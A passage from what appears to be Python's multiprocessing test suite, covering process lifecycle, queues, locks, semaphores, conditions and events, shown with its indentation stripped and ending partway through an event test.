#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
